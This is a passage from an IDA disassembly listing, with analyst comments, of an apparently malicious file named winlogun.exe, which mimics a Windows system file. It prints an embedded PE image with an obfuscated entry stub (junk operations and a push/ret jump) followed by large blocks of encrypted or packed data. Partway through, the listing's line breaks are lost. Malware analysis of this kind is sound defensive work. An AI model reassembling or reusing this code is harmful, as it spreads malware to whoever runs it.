                dd 5000h, 400h, 0B2CDh, 2, 100000h, 1000h, 100000h, 1000h ; SizeOfImage 5000h, SizeOfHeaders 400h, subsystem 2 (GUI)
                dd 0
                dd 10h, 2 dup(0)        ; 10h data directories; the export directory entry is empty
                dd 3000h, 28h, 1Ch dup(0) ; import directory at RVA 3000h, size 28h; the remaining entries are empty
                dd 7865742Eh, 74h, 2000h, 1000h, 1C00h, 400h, 3 dup(0) ; section ".text": RVA 1000h, raw data at file offset 400h
                dd 60000020h, 6164722Eh, 6174h, 2000h, 3000h, 600h, 2000h ; code/execute/read flags; section ".rdata": RVA 3000h
                dd 3 dup(0)
                dd 0C0000040h, 72h dup(0) ; initialised data, read/write; zero fill up to file offset 400h
; ---------------------------------------------------------------------------
; File offset 400h of the embedded image, i.e. RVA 1000h, the entry point named
; in the header above. IDA lists it at this file's addresses, not at the
; address it would have when winlogun.exe itself is loaded.
                push    ebp
                mov     ebp, esp
                add     esp, 0FFFFFFBCh ; same as sub esp, 44h: room for locals
                pusha
                mov     cx, 9C5Dh       ; this and the other register writes before retn do not touch esp
                not     ecx
                lea     edi, ds:0FFADA247h
                mov     dx, 80E9h
                push    40104Ch         ; target address, inside the embedded image's .text (image base 400000h)
                mov     edi, ecx
                mov     ecx, 213083F9h
                mov     cx, 1DFCh
                lea     ecx, ds:7549DE2Ah
                sbb     ecx, 97942BBh
                not     ecx
                lea     ebx, ds:10F1A4Dh
                mov     edi, esi
                retn                    ; pops the 40104Ch pushed above: a push/ret jump, not a return to a caller
; ---------------------------------------------------------------------------
; Bytes IDA left undisassembled, presumably because it stopped following the
; code at the retn above. Some dwords hold ASCII fragments ("Kern" across
; 4BDF45C7h/816E7265h, ".dll" in 6C6C642Eh), which suggests strings built from
; immediates - TODO confirm by disassembling from 40104Ch.
                dw 0CEC1h
                dd 7071B91Dh, 0E7812D1Eh, 0DF966D2Bh, 4BDF45C7h, 816E7265h
                dd 0BB3B11F2h, 16EDBB6Dh, 0DA33853Ah, 0DF81D1F7h, 652FBAA3h
                dd 0DEF7DBF7h, 45C7DFF7h, 336C65E3h, 0C1D7F732h, 0F9330CE3h
                dd 759BC8BFh, 0E745C789h, 6C6C642Eh, 0DBC1DE33h, 3DC18100h
                dd 0F7156E8Ch, 16CFC1DBh, 0D8DD1F7h, 394E1860h, 0EB45C6h
                dd 0B966CE87h, 0EEC1C184h, 0C1CE8905h, 458D05E1h, 0F7F033C8h
                dd 33F189DBh, 91D8DDCh, 0BF114A81h, 8164FCACh, 0CB59AFBFh
                dd 50D98B95h, 0F70ECEC1h, 9D1C1D7h, 995C158Dh, 0D3813100h
                dd 0F51C3E04h, 8B90FD33h, 0BBB66FEh, 0A9158DA4h, 87F5351Ch
                dd 81D6F7CEh, 0F7E258E3h, 90CE8955h, 4497BF66h, 1D8DF28Bh
                dd 1FECAD77h, 0D78BCE89h, 0DFA1BE66h, 90FBE9BAh, 8DDA89D5h
                dd 0C3C1DF45h, 0D5E28103h, 0B9EFA9BCh, 6DB20EDDh, 0B353DA81h
                dd 0CF8BD16Fh, 441B3FBEh, 0B5BF50A9h, 0F7FFC409h, 11BF66DFh
; The operand list of the dd below continues on the next line of this listing.
                dd
513D8DD5h, 816DC0FCh, 0E8FAF7EEh, 0A415FF7Fh, 0B9004030h dd 95DDDF6Ch, 8D18CBC1h, 0A6CB9D1Dh _text ends ; Section 2. (virtual address 00007000) ; Virtual size : 00006000 ( 24576.) ; Section size in file : 00006000 ( 24576.) ; Offset to raw data for section: 00007000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _rdata segment para public 'DATA' use32 assume cs:_rdata ;org 407000h dd 0F7D18BBFh, 0F1BF90D6h, 81C112FAh, 179791DFh, 1ECAC1C1h dd 0DEF7D9F7h, 0E7C1C833h, 9CBB6610h, 158D90ADh, 572204Dh dd 85A198BBh, 0FFDAF7D5h, 40308015h, 33F63300h, 50D6F7D8h dd 0B8BED633h, 339138CDh, 66CE89FAh, 813B62BFh, 97FBDDDAh dd 90CF8B6Dh, 0E53DCA81h, 1D8DF548h, 6DBF4211h, 661EE9C1h dd 66FF43BFh, 90649DBEh, 1A56BB66h, 0F82F0D8Dh, 0EB817900h dd 0CF830000h, 0D033FA8Bh, 45C7D6F7h, 676552C8h, 22D28169h dd 337F9893h, 0C7D2F7FAh, 7473CC45h, 0ABBA7265h, 89D126CDh dd 0BABF66F1h, 0C7F2876Ah, 6553D045h, 0DBF77672h, 0CA33DAF7h dd 321BB966h, 57C0358Dh, 8D904FF1h, 21B27115h, 33D13375h dd 86B966D9h, 81D38781h, 290B7BE1h, 0B87AB9C1h, 3D8DB559h dd 815A8919h, 0D610BA90h, 0DBF1525h, 666D9263h, 0C7C1FEBEh dd 6369D445h, 0EB815065h, 1564975Ch, 0C381F033h, 95C0916Eh dd 0B5FD29BBh, 16E1C16Fh, 0F38BD2F7h, 4561358Dh, 45C755C8h dd 636F72D8h, 77EE8165h, 0BFE10E71h, 95F43CBEh, 0E7C1D9F7h dd 1D1C114h, 0FE8C158Dh, 0D8DEF92h, 0CDD7557Bh, 0DC45C766h dd 0CA817373h, 7135B75Fh, 0ACCBC0BAh, 0D6EE814Fh, 8DD5B440h dd 0B46F53Dh, 66FA87F5h, 8D6417BFh, 1BD61935h, 0DE45C649h dd 0CDBA6600h, 2E9C10Eh, 0F833F781h, 81907938h, 860371F1h dd 9C358D95h, 87A163A2h, 90D7F7CBh, 8B1DD6C1h, 0B9D68BD9h dd 0EF905D84h, 0C71158Dh, 1D8DFD2Ch, 0CD8643BEh, 0D7F7DD33h dd 308815FFh, 0CFC10040h, 18E3C11Bh, 0DEDAD781h, 0CA875F82h dd 4E55BF66h, 3D8DDFF7h, 0DFFB66B5h, 840FC00Bh, 0A6h, 0DEF7DF89h dd 0F706C3C1h, 0EBEA81D6h, 0F72F8CEDh, 0DEF790D7h, 0D033CB89h dd 62D8E381h, 0E0BEF55Fh, 0C155E0DAh, 
0D6F70AD1h, 0AB9A99BAh dd 1D8D900Fh, 2FEEB413h, 8D07E6C1h, 55EFBF15h, 66D2F725h dd 812250BBh, 0C6E3DACBh, 8CD2F7CDh, 0E334B9C8h, 0F981797Bh dd 0DD566EEAh, 0E281D9F7h, 0EDBB988Ch, 0D8DDBF7h, 0D13F9EA2h dd 0E40ACB8Bh, 34850Fh, 0C3C10000h, 0B9DAF719h, 0A57B794Dh dd 26B3BE66h, 0C2A5BA66h, 0DAB9006Ah, 0F7A160ADh, 17D7C1DEh dd 309815FFh, 0C9C10040h, 0C1DFF71Ch, 0DF8915E3h, 0ED9BFE81h dd 0F8833165h, 0BED78B05h, 0C90AEB3Ah, 0E681D333h, 6FE20B87h dd 7EE41D8Dh, 0DFF795CDh, 9368D633h, 66000002h, 0BE7310BAh dd 215159CDh, 458FD7F7h, 0C1F287ECh, 0D1F71ACEh, 0C109EEC1h dd 0F79004EAh, 1FDEC1D2h, 0B912E1BAh, 8135BF55h, 0DAC13544h dd 47F98114h, 0C7293EBDh, 699CF045h, 0CBC1AFFBh, 6DCE8109h dd 0F76D7DA9h, 52F389DFh, 0C103CBC1h, 0BF6615C7h, 0DBF73F99h dd 6537E6B9h, 66D9F741h, 8B4E69BAh, 0DFF750F7h, 907EBA66h dd 331EC1C1h, 0F7DA33CBh, 0C2BB66DAh, 0DC15FF52h, 66004030h dd 0F73C5CBEh, 0BADE89D3h, 0D50844D8h, 6605D2C1h, 0C12DB4BFh dd 0D8D16EEh, 8FA9B911h, 53ED6335h, 22C981AAh, 8DCDC74Dh dd 301F873Dh, 0C1DAF7F5h, 60BE08CAh, 0C1958CCEh, 458909DBh dd 33D6F7F4h, 17D2C1F6h, 8A0E8EBEh, 4D9C1AFh, 0F4D18190h dd 81ED02C0h, 0ABBEC7FAh, 90F2891Fh, 8BBEFE87h, 3395F646h dd 15D7C1CEh, 18A164h, 0D7810000h, 5561F3CDh, 0C703D8Dh dd 3D8D5FC6h, 15CB7FC1h, 0C181D1F7h, 0D5F20E59h, 0DDFDDFB9h dd 30408BD5h, 8256C181h, 51B96F90h, 8D1FF499h, 7261EF35h dd 0F7DA8B81h, 1ED1C1D1h, 1273358Dh, 70FFCFC1h, 96E68102h dd 33D5CFE0h, 0F7DD33DCh, 61BB66D3h, 50CE3398h, 6BFFB89h dd 8D4FE0A1h, 38DF370Dh, 50C9810Dh, 0F7413D01h, 0BFEE81D9h dd 90EF84D0h, 0BA2783BFh, 8DD93395h, 50E1B515h, 3D8D9095h dd 0B1551B28h, 0D2C1D1F7h, 33F78B10h, 90CA81FBh, 0F7CFE38Fh dd 240C7DBh, 2D2D2D2Dh, 2B1FBF66h, 0D37ABE66h, 0EAC1F033h dd 0F7D13301h, 0A5C781DEh, 0C1BFE2F6h, 15FF0FCBh, 403068h dd 0CE5FB966h, 0A696B966h, 0D78BD2F7h, 840FC00Bh, 0FFFFFE00h dd 60BCBF66h, 0EA81F733h, 1F931576h, 0BB66E08Ah, 0D381F7D3h dd 95F6D5BAh, 606C0D8Dh, 0FA870F8Ah, 0F281D987h, 815DECECh dd 3312BB66h, 0BA26BF66h, 5FDF8190h, 0C155B0FAh, 0D78111EBh dd 556218B2h, 383CBF66h, 
0D533D6F7h, 6690CA33h, 0F712CABBh dd 0C1F733DBh, 0FC3308C8h, 3319CAC1h, 7CFC1F4h, 0CC4F358Dh dd 0D9873FF6h, 0CA33E08Ah, 5105EB81h, 358D15EBh, 692DEF87h dd 0F708C8C1h, 0CC09B9DAh, 0BF663D68h, 0DE897149h, 88D8E681h dd 35B9496Ah, 0F76139B6h, 89E08AD1h, 8DD9F7D6h, 2F9B9F0Dh dd 52A3BB19h, 4589CD8Fh, 95B966F8h, 0C1F23382h, 64BF1BC1h dd 66ED9F36h, 0C1EC0DB9h, 8D901FE3h, 2D3FBD35h, 66D43355h dd 87C7B6BFh, 0F7DBF7D3h, 90D833DBh, 0EB39358Dh, 358DB526h dd 9FAE87EAh, 0FB071D8Dh, 0D689B959h, 2D70F281h, 0CB8BC54Eh dd 0D833DE89h, 12B96658h, 0EA0D8DF0h, 815FD00Bh, 5492B9F2h dd 2408F5Dh, 0FF33D9F7h, 0AF70BB66h, 0BE0ED9C1h, 0EFDAB837h dd 89FC458Dh, 0B9D3F7D3h, 49150914h, 89DBF750h, 0F7FE33FEh dd 8D406AD2h, 0EC0EC53Dh, 4134BED5h, 0EFC19FC3h, 0F7D1F704h dd 18DEB9DFh, 0B868ED94h, 0C100000Eh, 0C8330EC6h, 0F712C1C1h dd 79BA66D1h, 68CF334Ch, 401B88h, 0EBA386B9h, 903D8D15h dd 0F7695955h, 66F38BDFh, 0B974C9BAh, 57AD778h, 6AF14CBAh dd 0FFDBF705h, 40307015h, 19CBC100h, 0BF66DFF7h, 5DB9B73Fh dd 6695B1D1h, 8B0194BEh, 4AF381CAh, 90EFA794h, 0CAC1DEF7h dd 81D9F710h, 6C9A4EF3h, 7ABB6681h, 0E8158DE6h, 66415564h dd 0F7E89EB9h, 33B990D3h, 0C15FBFD4h, 0F18B10CFh, 0C11EE3C1h dd 458D1DE3h, 0F8DF81C4h, 0C1CDDE80h, 358D0ED3h, 0DFA77943h dd 68h, 0E2D181F0h, 0BE4FAA58h, 0C546D22Ah, 6619CBC1h dd 335FB1BEh, 6AF033FCh, 0CBBA6601h, 19EFC1BBh, 14DEBF66h dd 0CE89DEF7h, 0BE66DEF7h, 158D1A09h, 0D147B572h, 0D9F7006Ah dd 1B9F233h, 6AF57FF9h, 8DD83300h, 4AD6D73Dh, 281D8D11h dd 89B52B6Bh, 0DA8150F9h, 14C7A23h, 0E856C0B9h, 81D6F77Fh dd 0BDC74BF7h, 0F815FFCFh, 66004030h, 330B6ABEh, 66CE8BD0h dd 0F72681BFh, 6DBE66DBh, 0D7899096h, 870CC9C1h, 99F281CBh dd 90BD62D3h, 8D08C6C1h, 35F2F43Dh, 6D1C17Dh, 0B76D60BFh dd 5DBC1CDh, 0EE7F158Dh, 0C781CDFBh, 0D5AC1FABh, 49EEBF66h dd 0C1C0458Dh, 0BA660FE7h, 0DD338491h, 54ECCF81h, 56BFEDE7h dd 50951314h, 0DBF7D7F7h, 0BE66F733h, 0E2C1182Ch, 0F7006A04h dd 1AD7C1DFh, 43783CBBh, 8D006A2Dh, 331171Dh, 81D9F7F5h dd 4FDB86C6h, 0BCBF6671h, 0BF3D8D2Bh, 6895D069h, 8003h dd 0D6F7D387h, 158DDFF7h, 
0CDD4835Ch, 0FA89DBF7h, 0BBC475FFh dd 19010749h, 0BE66DD33h, 0D6C1B0F7h, 0F599BA09h, 0EFC16DCBh dd 2415FF19h, 33004031h, 81DEF7D0h, 0AE17C7E2h, 0C1FF338Fh dd 8D901CC3h, 86F15535h, 1F358D7Fh, 0C1D10643h, 358D04D6h dd 9FCAE272h, 4B71C181h, 0FE8B55BAh, 0C190FE87h, 358D14D7h dd 715686A7h, 5836BA66h, 8C8B358Dh, 0DBF78FF9h, 0C1EC458Dh dd 0D9F71DD1h, 0E4C5BA66h, 0BE66D9F7h, 6A9EFDh, 0F718E6C1h dd 19EEC1DFh, 0CB33146Ah, 0DBBED6F7h, 5015CE9Dh, 0A207F181h dd 0CEC14FC4h, 1687BB1Ah, 75FF8568h, 0CFFE81C0h, 811901BBh dd 103105E6h, 32BE6641h, 2815FFA8h, 66004031h, 87951ABEh dd 1CFABED9h dd 0D1F74D35h, 13DB33BFh, 81CF8B29h, 7D3C7ECBh, 0F18B9055h dd 6617E2C1h, 0B9F367BAh, 0B540799Eh, 409F681h, 0EFC16DB3h dd 0BAC68102h, 90796500h, 0EFC1CF8Bh, 1A158D12h, 89C93967h dd 2FB966FAh, 0E7DF8168h, 8D857779h, 0BE66BC45h, 0DD33D53Ah dd 0C118E9C1h, 0D7F712EEh, 0D50B966h, 66CF8950h, 333DB0B9h dd 68CDh, 0FB330080h, 4CED3D8Dh, 0B9667528h, 0BE66EFDBh dd 3D8DAC69h, 3FFD1F77h, 0E27AB966h, 0C3C1D2F7h, 0C075FF17h dd 0DDE97BBBh, 15E2C1CDh, 0C3C1DE87h, 0F9E0BE01h, 0D8D95E9h dd 4FEBB5ACh, 680168h, 17DEC100h, 711B3D8Dh, 0DA814D54h dd 0EDBDFF8Ch, 0F833C933h, 1562BF66h, 0F2FD31BBh, 0C475FF6Dh dd 0DAF7DF33h, 0C9C1D533h, 2FB96610h, 262FBE0Bh, 85BB894Eh dd 8BCD867Fh, 2015FFCAh, 8D004031h, 0C5265C0Dh, 0EC158D55h dd 666527BEh, 8D9C2CBBh, 0E68D391Dh, 0F98B906Dh, 8ED4EA81h dd 0CA87C175h, 6DBFF333h, 337518A1h, 0B0BE66F2h, 0CBCB81DBh dd 90156682h, 0C4A5FB81h, 0B96DA6h, 0F74F9FE8h, 0EB868D3h dd 0F1890000h, 4F323D8Dh, 0F83315EDh, 6E0EBB66h, 48580D8Dh dd 335415F5h, 18C7C1FBh, 5EBBD987h, 87EDE963h, 1B8868FBh dd 0BE660040h, 0D2F7F2FEh, 6ACC33h, 0ACBED78Bh, 89CFE0CBh dd 9C158DF2h, 0F799644Ah, 1F23BBD1h, 0D7C19539h, 17C3C107h dd 0BE66016Ah, 0BBBB58A9h, 33B5707Fh, 0BEDFF7F6h, 0BF8B3147h dd 0E2C1006Ah, 746EBE02h, 0FA8715E4h, 0ACE9CEBEh, 0D7EF81EDh dd 0BBDFA159h, 5FED0567h, 82F7FF81h, 75FF4FD4h, 0BAD2F7BCh dd 6FDA0667h, 0D387CA89h, 0CB87D733h, 0FF1FE6C1h, 40310015h dd 4C48300h, 22D3BF66h, 69B9CE89h, 0C1D5B955h, 9EBA0DC3h dd 
66EDA3E4h, 818007B9h, 0AA2FA7D7h, 90DEF7CDh, 84F5EABBh dd 1ABE6615h, 0B6158DE7h, 8D95F367h, 99CCA41Dh, 90D7F79Fh dd 871DD6C1h, 86158DFBh, 0C13944ECh, 0ECB906D1h, 8BEDC3C2h dd 0E9C961CEh, 0 dd 9C0D0104h, 0C7492656h, 0CCFC2A17h, 0C123F96Ah, 0A59EF7B9h dd 4B3523F7h, 55DEDAE6h, 94BA73F5h, 97871B6Dh, 2DE933EDh dd 27E36726h, 0E7A50123h, 8CDB09A9h, 707CABCEh, 41CD48FEh dd 0B39DF87Ch, 55F960BCh, 0A8479F17h, 0BD322D87h, 558B01EEh dd 29599DEEh, 0E56DD063h, 1B5331B7h, 0EB0B28A6h, 0D78003A0h dd 626D210Ch, 0B007BE21h, 92ED500Fh, 0E7E99397h, 2B67AF4Fh dd 58BB67DBh, 26CD1623h, 1E9AF3C0h, 3FB60FC8h, 87266AC9h dd 0A2C4D0A3h, 0FAB23F83h, 0CEA1232Eh, 3E16BC7Ch, 0EBC87B6Ch dd 8B4B768Bh, 73A54E9Dh, 0D07EC7D3h, 0FF58C3A4h, 0E2C013ECh dd 0C2184859h, 28393DD9h, 62CA1DC5h, 4F2A6730h, 20806274h dd 42C39F25h, 303CBBE0h, 94D57546h, 0CFFCBD00h, 573ED059h dd 0D952F447h, 402E3B06h, 462B43C9h, 0DEE6DC2Fh, 0F402C1B2h dd 0B775474Dh, 0D54DF4E6h, 4680C5C7h, 10FDDC2Eh, 21FBC23Ch dd 6DD57FD2h, 0E7CF5CA3h, 9F45784Fh, 7D096E7Bh, 0CADB8644h dd 0DC827E03h, 0D3683842h, 2C8AD80Fh, 4423BCF3h, 0BB2EA455h dd 7CA7C200h, 0C5A47677h, 0A8029088h, 516E58Dh, 0B896448Bh dd 0C2ACA619h, 1035FCEDh, 9B9C9CB1h, 0A1D78866h, 0F7B310C1h dd 9DDA492Fh, 57A4044Fh, 75E0776Fh, 576EB42Dh, 0EFE6B28Ah dd 0D0D4C07Bh, 0F0B8622Ch, 5DADB33Fh, 0A0EE6003h, 1FF80CAEh dd 7CBDC9DAh, 0DC49E35Ah, 0DAEFB51Fh, 8FCEF93Dh, 0F5E8CB10h dd 3D08A37Ch, 88F82DF5h, 0F60B2568h, 225AB9EDh, 9DBCE1CCh dd 0AC914C5h, 3574464h, 1F187B11h, 661AA981h, 9FFD3108h dd 1A4518E9h, 6A86F6F4h, 0ADC5DD62h, 5ABF5866h, 6765D21Eh dd 2A13821Ah, 0ED3056E0h, 72875FEh, 204CCAB2h, 0A3333EEDh dd 37B45891h, 0FDC05C02h, 0A89F0E24h, 645CB8B8h, 6AE04AEDh dd 8F718950h, 4870F0D8h, 49784A5Ch, 32AF498Ch, 0DB58A44Ah dd 3712B715h, 19E9312Eh, 0CA133CEFh, 51E935FBh, 0A991432Dh dd 0BEB9A2Ch, 5ABD4050h, 0BBC5B1D4h, 40897918h, 0BCAB16D8h dd 251B23Ah, 0B33BC40h, 85ABF436h, 7D9310ABh, 95B6B3Dh dd 0B897980Ch, 9C90C546h, 0A8E4AB4Bh, 8CD0647Ah, 6402F45h dd 5A7EF20Bh, 92CF9300h, 0FB0521E1h, 927E6A03h, 
97F16A0Dh dd 0B8876D8Dh, 2F09729Ch, 0C4B87CC8h, 6D4D9E01h, 2977CAC7h dd 8FBDA597h, 123E3C36h, 0AC945FF3h, 839E5709h, 35EB636Eh dd 0A0EC3F1Bh, 0E8C00C8Ch, 0C929CFE4h, 0B48A9438h, 704C9175h dd 0A707BFCEh, 0AB2466DDh, 0E7688DAFh, 0B4D6F081h, 0FEC21EE8h dd 0CD34F3B1h, 2936FC86h, 38E604DBh, 6178C78Ah, 64AFBCB5h dd 4C565167h, 16D8A54Fh, 0BABAC35Ah, 2701DA63h, 0E14A9D74h dd 204BC70Eh, 7ED07EC1h, 18BA921Bh, 50C3F678h, 0C871B001h dd 95E60CEBh, 93663D0Fh, 0DE3DE986h, 6D196FEh, 4A49AA5Ah dd 65E06974h, 0CBD1AA0Fh, 0F719E7EDh, 0A2F54A15h, 0CAD6BEE0h dd 0A9BA885Fh, 90EE972Bh, 6E3DF41Bh, 80B65D9Dh, 218DD281h dd 19A8DADDh, 5BDBF2Dh, 0A48A7411h, 0A2FC37Ah, 90A4F5E2h dd 3ABF79E5h, 1BC11958h, 161A0A6Bh, 26924228h, 0CC97C332h dd 3C190A7Ah, 69D45D07h, 0C1701880h, 0E24560E8h, 9EAC7E25h dd 0F0992CC5h, 445A8535h, 0A4CFF946h, 0CBC31B22h, 3D192930h dd 0F825F22Ah, 268F6B7Eh, 799D3B1Ah, 8696202Fh, 5C393B8Ah dd 7FE22AB2h, 67F53A8Eh, 843B4687h, 0E4D68F4Bh, 0A24E71A9h dd 0B5755F71h, 0EB20F802h, 7072B866h, 0DD7308EDh, 825DFD68h dd 0ADBB0016h, 5A89366Eh, 134F63DFh, 87454F38h, 33213FAh dd 9744B61Ch, 0F5FA1B32h, 0BA521B44h, 81FA9B59h, 0EB8A1A29h dd 644234B4h, 0D1C96809h, 0DA032CAAh, 0FB41AAB5h, 0B2C217C7h dd 49D17D2h, 3C84A4B9h, 54CA29D7h, 7BFF1B44h, 35CC4E9h dd 1EF44DD0h, 412ECCC1h, 0A6ABCE78h, 2074A809h, 1A602D5Eh dd 0D2CE962Bh, 30AF52B6h, 261137F2h, 1F8C012h, 6CAE5848h dd 14EE551h, 66C6E32Dh, 91438207h, 0F2CBFB01h, 0EC148AB9h dd 0EB561B26h, 0E245F693h, 6002E289h, 0ABD3B10Dh, 1732B8A4h dd 910E557h, 964EC6ADh, 43984264h, 7BCAFE5Ah, 0FC6402D8h dd 5FD2643Dh, 65B7617Ah, 8DD45DBEh, 0C0F771E8h, 3AE3748Dh dd 0A5AA41D9h, 0C5A53B20h, 7FD85E1Ch, 8313724Fh, 0A3E9606Ch dd 72E1E38Fh, 2969AC6h, 15D6802Ah, 0E9C9564Ch, 0D7AED1A4h dd 1B5FDEF0h, 66651942h, 0D6E42EC4h, 91FEB940h, 3A148640h dd 0A08FBEF4h, 0C6719232h, 0A13A8A9Eh, 5F874922h, 412969E4h dd 0F94A2733h, 0E598F4A1h, 5D938881h, 97CE3FFFh, 5CFFD1D6h dd 0D3F056F2h, 6223280Eh, 92A46A64h, 6E6AB1D0h, 0BC56CFADh dd 0FCE3AD7Eh, 432F6F90h, 9861C050h, 0F6CF292Ch, 
147DBA6Eh dd 7EF6C721h, 0F1BF8B8h, 8627858Ch, 0EEEFC1F8h, 0A7000887h dd 12ACF841h, 0E83FAFACh, 7F975887h, 591B24E3h, 2E070036h dd 55627F25h, 889C0368h, 0BC5C2295h, 0D2F6413Dh, 0CF496BDh dd 0A64451CFh, 33D32762h, 535D2A75h, 7D8FECA7h, 0C77BE36Bh dd 3F001627h, 5F50CF7Fh, 977ECD1Dh, 0B30152ADh, 0E3215Ah dd 173AA242h, 12461B37h, 0FAC55636h, 9C1B0C54h, 6B9553Bh dd 0EAD61DD4h, 4AE3F625h, 5C8A4A2Ah, 8CBCDBA3h, 0AD1F1FD2h dd 0CB950F38h, 3D77F0C4h, 8D3420D1h, 0FF760150h, 9BCBC16Ah dd 0F6629581h, 95357201h, 0B8587A0Eh, 79820487h, 799ECCCFh dd 7F739FA4h, 1D5E07BEh, 29983EFEh, 338B5303h, 0FA7B458h dd 0FF23EAC7h, 204CF58Dh, 0B72140Fh, 4BADB500h, 0A9C50BF2h dd 0DD96D154h, 949974F9h, 58E37F9Ch, 0A2E60E70h, 0F636C2DFh dd 32C9645Eh, 0E586AD42h, 8B7ACB91h, 0B12AC11Dh, 3E76DA28h dd 0C84F8B67h, 215ABEC2h, 3801B4FEh, 8592227Eh, 0A8D3282Fh dd 0B8DE93BEh, 4905E0EAh, 0D4EFAF1Ch, 3635AA4Fh, 1B4B7C4Fh dd 64E352Ah, 368804DDh, 0FFFDE3C9h, 7BE2FE26h, 0AD972409h dd 0B50839EAh, 4BED9BC8h, 0BD7BD607h, 93183A7Dh, 15EE80EDh dd 0C6542531h, 1550D74Bh, 0D9BAB855h, 0ADDE0FF8h, 5D39CB6h dd 804041C2h, 72385A70h, 0C320F2B0h, 652548F2h, 0B5666E48h dd 21315B36h, 0F0A137DDh, 9FC46330h, 0EDE3AFBAh, 769A7FAh dd 0D6F0FA9Eh, 0DBF354C6h, 6CCE22EAh, 0C6C0268Eh, 5406454h dd 8EBCE6BAh, 2508C08Fh, 0A5323E80h, 0E8C451E7h, 946EA19Ch dd 4C436076h, 6A34A2FDh, 370EAF1Fh, 0CA38C682h, 636904FCh dd 0B515BFD7h, 0D3190ED9h, 0A6FF1FD9h, 3E74E7A7h, 0AFA48704h dd 31B81D12h, 0BACF3931h, 68BA1610h, 46C488E6h, 93EC7578h dd 400123A1h, 0E081D914h, 14B4B987h, 1784622Fh, 9C008DD8h dd 0FFBE1213h, 0DB29FEA8h, 5013C036h, 0BF7AC891h, 8E226E69h dd 3A64521Bh, 0A664920Eh, 7F59EE2Ah, 74A7640Dh, 0F5996D12h dd 2CC93ACEh, 85BD452Dh, 5DD3C80Dh, 0BC494BC2h, 0E6349410h dd 13A6EEBBh, 9C51B9D5h, 56B13C75h, 2557CF9h, 0DD3E6E1Eh dd 53A18E66h, 0C8945347h, 1DBD6AF7h, 0CC5BB1E4h, 35E19F5Ah dd 72FC8729h, 3663964Fh, 0A0CDF2BBh, 3494606Eh, 1F9BA3B8h dd 9B5CA719h, 1BF5BD5Fh, 5CFA43A9h, 425E534Eh, 77EFC7C5h dd 1BED7CD7h, 53E0CBB2h, 0A018FBCFh, 6B492490h, 
242208Eh dd 0B258E6E5h, 43C9885Ch, 828B7EDh, 8C4805F2h, 9D010555h dd 431769DCh, 1F7398AEh, 0E4CFB4BCh, 4247B82Bh, 0B89997CCh dd 0E3278018h, 7C5BC0EBh, 0E865E294h, 2555C9C2h, 22D71B61h dd 82CEB354h, 0C2A5648Ch dd 0A2BDA771h, 0A0336875h, 2CE5EF93h, 3913C93Ch, 0C183A17Bh dd 0CB575D94h, 307B91E9h, 1E038D36h, 22CF8E17h, 0DF071F6Dh dd 7C37E2h, 0CA0D5F23h, 9B2B1B5Fh, 397157ABh, 0BABD6985h dd 0E02EF1FFh, 0F26941B2h, 970EB684h, 470511D0h, 0BA9DEA33h dd 0BB76CD3Dh, 2FCDC3D3h, 0A0B59D07h, 4A78A8C7h, 0BA4CCFABh dd 3086F601h, 4D4B1CBEh, 0AF3F70D7h, 7A403C12h, 385FE096h dd 0CDBD6520h, 0F0A8E928h, 4DD3381Ch, 0E426BA11h, 42CB13EBh dd 0B7071E7Ch, 68C2AFB0h, 9E0BAF53h, 0E8C98007h, 244445D7h dd 0A08BAEEAh, 0E36401C2h, 66C88579h, 10A97C06h, 77E90910h dd 0B0E0EBC7h, 0B6F42442h, 8DD36DE1h, 3C060F54h, 4D90F5CFh dd 0CB03550Ah, 6462660Ah, 0A0F8F7B5h, 0C26F3303h, 33914962h dd 244B3210h, 76755013h, 0E2E8D4D1h, 0B0F73624h, 90BD80BDh dd 936FA1C8h, 5DC2D2BEh, 0C47CC299h, 9D4D6AC2h, 8F4038FBh dd 0F518D74Bh, 4F01662Dh, 0A98B26A8h, 5628CB14h, 5527EBB8h dd 89CF47B4h, 0BD8038Fh, 312121C7h, 0DE663873h, 65B4AE46h dd 5309354Fh, 33D5DE02h, 5AAFC85Eh, 95AA86C5h, 0B4719F43h dd 59DBED89h, 0E76117D6h, 7BE58F59h, 0FAF0CBA8h, 88DE01CDh dd 3FD35A5Bh, 717B848Ch, 15021C70h, 0D3A52E13h, 92A88424h dd 5DAF297h, 0CBE90927h, 5095E105h, 530D3D53h, 8E993DDCh dd 3EDEF350h, 0D4C17279h, 44E10178h, 7F2B677Ah, 2AB1B251h dd 0F1DACF8Eh, 1358214Ah, 0A1AFD0F8h, 8A1F2769h, 19313145h dd 0F618F5AAh, 0C598BA4Ch, 3C5534C9h, 212CEB45h, 550B7748h dd 7EA8EC9Bh, 0DA3849ABh, 0D0F312CAh, 0C3A705D4h, 17C7EEA1h dd 91654E18h, 0A1C7EA7Ch, 38DEB38h, 8584F3E7h, 77E14A89h dd 9E86C898h, 0BAAA6262h, 3216F139h, 214BAE07h, 5D85C1Fh dd 4255F624h, 1B5F053Ch, 0F95C2086h, 5EE66F3Fh, 0F1B33161h dd 0D25FBDDEh, 0EEA8990Bh, 2CC1F022h, 93FC3DDEh, 48A0ED7Eh dd 1CDB922Bh, 11C5CE87h, 611DAEE9h, 0B1EB39A5h, 22E7405Fh dd 277C5B06h, 30725002h, 0C931B0A6h, 0B642883Ch, 0C7590DD2h dd 28F9407Dh, 0E4987D74h, 0FC5082BCh, 7D0271C0h, 8C79F6ADh dd 214F8FB9h, 0B0DA444Eh, 
0ADD3CAD2h, 0B89AC65Ch, 0BAB06435h dd 2E223F55h, 9EA58432h, 0D4CB28E6h, 71079DC2h, 5911503Ah dd 0A1FA99Dh, 0EF827998h, 0D060C318h, 66736662h, 3BFAFA4Eh dd 1AAAAF6Eh, 0CCB4E571h, 3EB0275h, 34A15AF0h, 244964F6h dd 0A808D391h, 292B423Eh, 82E3C436h, 0B6B7E944h, 0DF52A138h dd 6BBAB711h, 69F58EC3h, 5B0233B7h, 55A0BFE3h, 78514D84h dd 0A1F74EEAh, 5CCADD3Ah, 82772986h, 6F4EA7BCh, 3F6202D0h dd 3E91F56Fh, 0C07994D8h, 2E1770B8h, 0CF050363h, 0CE179E51h dd 303F69F8h, 0E3A991E8h, 0F24EF0C6h, 0F96D8194h, 0AEF7D772h dd 4838A1FAh, 93F7DBBh, 0DDD8EB40h, 71085E24h, 0B8C2701Ah dd 1516A85Dh, 961B1571h, 0AD3CC732h, 62A40D91h, 280E8E4Dh dd 5C3AF999h, 340A458Eh, 632BCA82h, 0FA1B19F2h, 0B3B27C55h dd 5F5F5F97h, 0CB52CD4Ch, 0AB926A47h, 5B494FCCh, 97E50883h dd 0F9118ED4h, 8307BF00h, 